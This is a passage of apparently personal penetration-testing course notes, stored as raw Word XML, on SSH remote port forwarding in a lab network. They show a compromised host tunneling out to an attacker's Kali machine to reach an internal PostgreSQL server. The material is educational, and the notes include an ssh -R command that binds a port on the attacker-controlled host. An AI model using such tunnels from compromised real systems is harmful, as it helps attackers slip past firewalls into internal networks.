    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B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BF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_or6cpmccgvk2" w:id="78"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Remote Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="475" name="image463.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image463.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId187"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="179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1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="859"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We set up SSH Client on Middleman (CONFLUENCE01) and SSH Server on Kali, so we run SSH on Middleman. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="859"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outcome: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On our Kali, our commands specify localhost/loopback and a specific port, which gets pushed by the SSH server software back to the SSH client (Middleman). And this gets through the firewall since we are using the same SSH tunnel. This then gets forwarded by the SSH client to the specific single port of a target machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inbound traffic is often blocked. Only in rare cases will we compromise credentials for an SSH user, allowing us to SSH directly into a network and port forward. We will only very rarely be able to access ports that we bind to a network perimeter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, we will more often be able to SSH out of a network. Outbound connections are more difficult to control than inbound connections. Most corporate networks will allow many types of common network traffic out - including SSH - for reasons of simplicity, usability, and business need. So, while it likely won't be possible to connect to a port we bind to the network perimeter, it will often be possible to SSH out.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH remote port forwarding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can be extremely useful. In a similar way that an attacker may execute a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote shell payload to connect back to an attacker-controlled listener (reverse shell)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, SSH remote port forwarding can be used to connect back to an attacker-controlled SSH server and bind the listening port there. W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e can think of it like a reverse shell, but for port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008CD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> local and dynamic port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Client Listens</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Server forwards packet</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Server Listens</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Client forwards packet</w:t>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ind w:left="-810" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7205652" cy="2178453"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="271" name="image257.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image257.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId187"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7205652" cy="21784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D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We now have a firewall that allows all outbound and only TCP/8090 inbound.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get around this, we can do a SSH Remote Port Forward, where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Client </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, how this works is that for our Kali, we send commands to our loopback address (localhost) on a specific port, which gets pushed by the Kali SSH server software through the SSH tunnel back to the SSH client on CONFLUENCE01. They are then forwarded to the PostgreSQL database port on PGDATABASE01.</w:t>
      </w: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t xml:space="preserve">First, we'll need to enable the SSH server on our Kali machine. OpenSSH server is preinstalled - all we need to do is start it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Warning: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you start the Kali SSH server, make sure you've set a strong, unique password for the Kali user!</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl start ssh</w:t>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t xml:space="preserve">We can check that the SSH port is open as we expected using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="203" name="image190.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image190.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId188"/>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DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ss -ntplu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SSH server is listening on port 22 on all interfaces for both </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: To connect back to the Kali SSH server using a username and password you may have to explicitly allow password-based authentication by setting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PasswordAuthentication</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">yes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on CONFLUENCE01 (the middleman)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="790"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command connects CONFLUENCE01 to our Kali machine (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.118.4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and puts a listener on our Kali on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And then whenever someone sends packets there, CONFLUENCE01 will forward that to PGDATABASE01 (our target machine) on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="790"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SSH remote port forward option is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and has a very similar syntax to the local port forward option. It also takes</w:t>
